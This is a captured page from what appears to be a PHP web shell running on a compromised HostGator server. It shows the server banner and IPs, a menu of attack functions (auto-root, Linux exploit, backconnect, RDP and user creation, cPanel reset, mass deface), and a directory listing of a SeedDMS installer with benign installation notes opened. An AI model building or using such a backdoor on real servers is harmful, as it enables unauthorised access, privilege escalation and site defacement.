Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 3.140.242.43
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
seed /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
89
B
-rw-r--r--
_clone.php
7.86
KB
-rw-r--r--
data.zip
8.37
KB
-rw-r--r--
edit.php
4.18
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
46
B
-rw-r--r--
import.php
3.07
KB
-rw-r--r--
info.xml
2.71
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
9.71
KB
-rw-r--r--
install.xml
2.27
KB
-rw-r--r--
md5
1.59
KB
-rw-r--r--
notes.txt
1.1
KB
-rw-r--r--
seed.sql
40.97
KB
-rw-r--r--
seed.zip
41.31
MB
-rw-r--r--
settings.xml
15.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. Extract the tar.gz on linux server and then make our zip. (Make manual installation on the extracted tar on linux to check for symlinks) 2. .htaccess is our file to redirect script to www. 3. Move the data directory to non web accessible directory before attempting to install manually and set the path accordingly while installing. 4. [IMP]Check and change symlinks in every version in install.php and seedsymlinks.php as well. 5. We have restricted the script on windows because it creates a lot of symlinks and those symlinks can not created on windows environment. 6. PHP REQUIREMENT LINK : doc\README.Install.md 7. Need to adjust symlinks in clone.php 8. In version 6.0.32 , we have changed ->withHeader('Location', '/out/out.ViewFolder.php') to ->withHeader('Location', $settings->_httpRoot.'out/out.ViewFolder.php') in file /seeddms-6.0.32/index.php as workaround suggested by vendor, since script was not constructing full URL properly with subfolder and was getting redirected to Docroot URL https://sourceforge.net/p/seeddms/discussion/general/thread/c68201a388/ . Check if this is required in next version.
Close